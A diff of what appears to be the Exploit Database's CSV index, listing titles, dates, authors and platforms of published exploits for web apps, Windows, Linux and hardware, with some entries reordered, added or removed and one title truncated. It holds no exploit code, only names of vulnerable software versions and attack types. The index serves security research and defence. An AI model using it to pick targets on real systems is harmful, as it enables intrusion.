+31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter - Cross-Site Scripting Vulnerability",2008-03-04,"Jose Carlos Norte",php,webapps,0 +31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting Vulnerability",2008-03-05,ZoRLu,php,webapps,0 +31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0 +31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting Vulnerability",2008-04-24,ZoRLu,php,webapps,0 +31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution Exploit",2014-02-16,Rew,hardware,remote,0 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80 31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Stored XSS Vulnerabilities",2014-01-24,"High-Tech Bridge SA",php,webapps,80 -31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 (index.php, id param) - SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 +31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 (index.php id param) - SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31177,platforms/windows/dos/31177.html,"MW6 Technologies DataMatrix - ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 @@ -27983,6 +28071,17 @@ id,file,description,date,author,platform,type,port 31181,platforms/windows/remote/31181.rb,"HP Data Protector Backup Client Service - Directory Traversal",2014-01-24,metasploit,windows,remote,5555 31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0 31183,platforms/php/webapps/31183.txt,"SkyBlueCanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80 +31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0 +31272,platforms/php/webapps/31272.txt,"Joomla! and Mambo 'com_joomlavvz' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-20,S@BUN,php,webapps,0 +31273,platforms/php/webapps/31273.txt,"Joomla! and Mambo 'com_most' Component - 'secid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 +31274,platforms/php/webapps/31274.txt,"Joomla! and Mambo 'com_asortyment' Component - 'katid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 +31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 spyce/examples/formtag.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 +31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0 +31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0 +31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 docs/examples/redirect.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 +31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 docs/examples/handlervalidate.spy x Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 +31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 spyce/examples/request.spy name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 +31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 spyce/examples/getpost.spy Name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager <= 6.1 - 'key' Parameter SQL Injection Vulnerability",2008-02-13,"Nico Leidecker",java,webapps,0 31190,platforms/linux/dos/31190.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2008-02-13,"Ralf Haferkamp",linux,dos,0 31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web 'agentlist.asp' Multiple SQL Injection Vulnerabilities",2008-02-13,S@BUN,asp,webapps,0 @@ -28013,6 +28112,13 @@ id,file,description,date,author,platform,type,port 31216,platforms/php/webapps/31216.txt,"Joomla! and Mambo com_scheduling Component - 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Include Vulnerability",2008-02-16,muuratsalo,php,webapps,0 31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service Vulnerability",2008-02-17,"Luigi Auriemma",linux,dos,0 +32241,platforms/php/webapps/32241.txt,"PHP Realty 'dpage.php' SQL Injection Vulnerability",2008-08-13,CraCkEr,php,webapps,0 +32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection Vulnerability",2008-08-13,Rake,php,webapps,0 +32243,platforms/php/webapps/32243.txt,"Nukeviet 2.0 - 'admin/login.php' Cookie Authentication Bypass Vulnerability",2008-08-13,Ciph3r,php,webapps,0 +32244,platforms/php/webapps/32244.txt,"YapBB 1.2 - 'class_yapbbcooker.php' Remote File Include Vulnerability",2008-08-13,CraCkEr,php,webapps,0 +32245,platforms/php/webapps/32245.txt,"Nortel Networks SRG V16 - modules.php module Parameter XSS",2008-08-13,CraCkEr,php,webapps,0 +32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - admin_modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 +32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0 31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Password Reset CSRF from Stored XSS (Web UI)",2014-01-27,"David Um",windows,webapps,0 31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow PoC",2014-01-27,Citadelo,windows,dos,0 @@ -28050,22 +28156,17 @@ id,file,description,date,author,platform,type,port 31254,platforms/windows/remote/31254.py,"PCMAN FTP 2.07 ABOR Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 CWD Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80 -31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0 +31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0 +31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0 +31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' - Local Denial of Service Vulnerability",2008-03-04,sipherr,bsd,dos,0 +31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter - Remote File Include Vulnerability",2008-03-24,ZoRLu,php,webapps,0 +31462,platforms/linux/remote/31462.c,"xine-lib - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0 +31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0 31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow Exploit (SEH)",2014-01-29,"Dario Estrada",windows,remote,53 31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443 31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80 31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0 31264,platforms/php/remote/31264.rb,"Simple E-Document Arbitrary File Upload",2014-01-29,metasploit,php,remote,80 -31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 docs/examples/redirect.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 -31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 docs/examples/handlervalidate.spy x Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 -31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 spyce/examples/request.spy name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 -31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 spyce/examples/getpost.spy Name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 -31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 spyce/examples/formtag.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 -31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0 -31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0 -31272,platforms/php/webapps/31272.txt,"Joomla! and Mambo 'com_joomlavvz' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-20,S@BUN,php,webapps,0 -31273,platforms/php/webapps/31273.txt,"Joomla! and Mambo 'com_most' Component - 'secid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 -31274,platforms/php/webapps/31274.txt,"Joomla! and Mambo 'com_asortyment' Component - 'katid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Comments.asp FC Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31276,platforms/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Labels.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31277,platforms/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 ClassList.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 @@ -28096,9 +28197,6 @@ id,file,description,date,author,platform,type,port 31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter NULL Pointer - Denial Of Service Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0 31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-25,The-0utl4w,php,webapps,0 31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0 -31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0 -31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service Vulnerability",2008-02-26,sipherr,hardware,dos,0 -31307,platforms/android/dos/31307.py,"Android Web Browser - GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",android,dos,0 31308,platforms/android/dos/31308.html,"Android Web Browser - BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",android,dos,0 31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow Vulnerability",2008-02-27,"Will Drewry",linux,remote,0 31310,platforms/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow Vulnerability and Denial of Service Vulnerability",2008-02-27,"Luigi Auriemma",windows,dos,0 @@ -28117,17 +28215,10 @@ id,file,description,date,author,platform,type,port 31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password - Remote Denial of Service Vulnerability",2008-03-01,"Maks M",windows,dos,0 31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 - minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 - simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0 -31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure, HTML Injection and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0 +31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure_ HTML Injection and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0 31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0.57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0 31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0 31329,platforms/multiple/webapps/31329..txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0 -31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0 -31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0 -31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0 -31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' - Local Denial of Service Vulnerability",2008-03-04,sipherr,bsd,dos,0 -31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection Vulnerability",2008-03-04,bius,php,webapps,0 -31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter - Cross-Site Scripting Vulnerability",2008-03-04,"Jose Carlos Norte",php,webapps,0 -31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting Vulnerability",2008-03-05,ZoRLu,php,webapps,0 31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0 31338,platforms/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",windows,dos,0 31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0 @@ -28139,7 +28230,8 @@ id,file,description,date,author,platform,type,port 31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 - Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0 31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 - Arbitrary write with CONFIG_X86_X32",2014-02-02,saelo,linux,local,0 31347,platforms/linux/local/31347.c,"Linux Kernel 3.4 < 3.13.2 - Local Root (CONFIG_X86_X32=y)",2014-02-02,rebel,linux,local,0 -31350,platforms/php/webapps/31350.txt,"CiMe - Citas Mdicas - Multiple Vulnerabilities",2014-02-03,vinicius777,php,webapps,80 +31529,platforms/php/webapps/31529.txt,"Joomla! and Mambo Cinema Component 1.0 - 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0 +31350,platforms/php/webapps/31350.txt,"CiMe - Citas M",2014-02-03,vinicius777,php,webapps,80 31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 - 'roomid' Parameter SQL Injection Vulnerability",2008-03-06,meloulisi,php,webapps,0 31352,platforms/php/webapps/31352.txt,"ImageVue 1.7 - popup.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0 31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 - dir2.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0 @@ -28185,6 +28277,11 @@ id,file,description,date,author,platform,type,port 31394,platforms/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,windows,dos,0 31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - CSUserCGI.exe Help Facility XSS",2008-03-12,felix,windows,remote,0 31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x - mod_userdir Information Disclosure Vulnerability",2008-03-12,julien.cayzac,linux,remote,0 +31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service Vulnerability",2008-04-22,"Luigi Auriemma",windows,dos,0 +31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting Vulnerability",2008-04-23,"Aria-Security Team",php,webapps,0 +31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN 'installControl.php3' - Cross-Site Scripting Vulnerability",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0 +31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI Redirection Vulnerability",2008-04-23,"Richard Brain",windows,remote,0 +31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow Vulnerability",2014-02-06,"Core Security",windows,dos,0 31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String Vulnerability",2008-03-12,"Luigi Auriemma",windows,dos,0 31400,platforms/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 - 'printpage.php' SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0 31401,platforms/php/webapps/31401.txt,"Acyhost - 'index.php' Remote File Include Vulnerability",2008-03-12,U238,php,webapps,0 @@ -28243,14 +28340,6 @@ id,file,description,date,author,platform,type,port 31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80 31459,platforms/php/webapps/31459.txt,"Joomla 3.2.1 - SQL Injection Vulnerability",2014-02-06,killall-9,php,webapps,80 31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation Vulnerability",2014-02-06,LiquidWorm,windows,local,0 -31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow Vulnerability",2014-02-06,"Core Security",windows,dos,0 -31462,platforms/linux/remote/31462.c,"xine-lib - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0 -31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base 'content_by_cat.asp' - SQL Injection Vulnerability",2008-03-20,xcorpitx,asp,webapps,0 -31464,platforms/windows/dos/31464.pl,"SurgeMail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow Vulnerability",2008-03-21,"Leon Juranic",windows,dos,0 -31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption Vulnerability",2008-03-21,"Brian Holyfield",windows,remote,0 -31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0 -31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 - 'setup.php3' Cross-Site Scripting Vulnerability",2008-03-22,ZoRLu,php,webapps,0 -31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages - Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0 31469,platforms/php/webapps/31469.txt,"ooComments 1.0 - classes/class_admin.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 31470,platforms/php/webapps/31470.txt,"ooComments 1.0 - classes/class_comments.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 31471,platforms/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 - 'index.php' Cross-Site Scripting Vulnerability",2008-03-22,Y433r,php,webapps,0 @@ -28297,7 +28386,7 @@ id,file,description,date,author,platform,type,port 31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 - include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php, zID param) SQL Injection Vulnerability",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 +31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php zID param) SQL Injection Vulnerability",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80 31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution",2014-02-07,metasploit,linux,remote,8023 @@ -28308,10 +28397,6 @@ id,file,description,date,author,platform,type,port 31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - (.pui) SEH Buffer Overflow",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 31525,platforms/php/webapps/31525.txt,"MyBB Extended Useradmininfo Plugin 1.2.1 - Cross-Site Scripting",2014-02-09,"Fikri Fadzil",php,webapps,80 31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hardcoded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80 -31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter - Remote File Include Vulnerability",2008-03-24,ZoRLu,php,webapps,0 -31529,platforms/php/webapps/31529.txt,"Joomla! and Mambo Cinema Component 1.0 - 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0 -31530,platforms/php/webapps/31530.txt,"Joomla! and Mambo Download3000 Component 1.0 - 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0 -31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 - 'haberoku.php' SQL Injection Vulnerability",2008-03-25,cOndemned,php,webapps,0 31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 - 'postview.php' SQL Injection Vulnerability",2008-03-25,U238,php,webapps,0 31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified Vulnerability",2008-03-25,"Nicholas Gregorie",novell,remote,0 31534,platforms/windows/remote/31534.html,"LEADTOOLS Multimedia 15 - 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 @@ -28328,6 +28413,8 @@ id,file,description,date,author,platform,type,port 31545,platforms/php/webapps/31545.txt,"GeeCarts - view.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0 31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 - lookup_result.asp domain Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0 31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - suggest_result.asp Multiple Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0 +31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - Malformed JPEG File Denial of Service Vulnerability",2008-06-27,"Beenu Arora",linux,dos,0 +31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0 31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities",2008-03-27,XxX,php,webapps,0 31550,platforms/bsd/dos/31550.c,"Multiple BSD Platforms - 'strfmon()' Function Integer Overflow Weakness",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 31551,platforms/multiple/remote/31551.txt,"Apache Tomcat 4.0.3 - Requests Containing MS-DOS Device Names Information Disclosure Vulnerability",2005-10-14,"security curmudgeon",multiple,remote,0 @@ -28351,6 +28438,8 @@ id,file,description,date,author,platform,type,port 31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - CSRF Vulnerability",2014-02-11,killall-9,hardware,webapps,80 31570,platforms/php/webapps/31570.txt,"Wordpress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 31571,platforms/php/webapps/31571.txt,"Wordpress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 +32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS search.php key Parameter XSS",2008-08-09,Lostmon,php,webapps,0 +32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS down.php id Parameter XSS",2008-08-09,Lostmon,php,webapps,0 31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880 31574,platforms/arm/local/31574.c,"Linux Kernel - Local Root Exploit (ARM)",2014-02-11,"Piotr Szerman",arm,local,0 31575,platforms/windows/remote/31575.rb,"KingScada - kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,metasploit,windows,remote,0 @@ -28455,9 +28544,11 @@ id,file,description,date,author,platform,type,port 31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 - 'beg' Parameter Cross-Site Scripting Vulnerability",2008-04-21,ZoRLu,php,webapps,0 31678,platforms/php/webapps/31678.txt,"SMF <= 1.1.4 - Audio CAPTCHA Security Bypass Vulnerability",2008-04-21,"Michael Brooks",php,webapps,0 31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 - 'mod_search' Remote File Include Vulnerability",2008-04-21,ZoRLu,php,webapps,0 +31714,platforms/php/webapps/31714.txt,"C-News 1.0.1 - 'install.php' Cross-Site Scripting Vulnerability",2008-04-30,ZoRLu,php,webapps,0 +31715,platforms/multiple/remote/31715.pl,"Castle Rock Computing SNMPc <= 7.0.19 - Community String Stack Based Buffer Overflow Vulnerability",2008-11-11,"raveen Darshanam",multiple,remote,0 31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module - 'article.php' SQL Injection Vulnerability",2008-04-21,Cr@zy_King,php,webapps,0 31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 - Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0 -31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution Exploit",2014-02-16,Rew,hardware,remote,0 +31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution",2014-02-26,metasploit,windows,remote,9090 31686,platforms/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,multiple,webapps,80 31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0 31689,platforms/windows/remote/31689.py,"HP Data Protector EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555 @@ -28467,12 +28558,6 @@ id,file,description,date,author,platform,type,port 31693,platforms/ios/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID - Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0 31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection",2014-02-16,metasploit,php,remote,0 -31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service Vulnerability",2008-04-22,"Luigi Auriemma",windows,dos,0 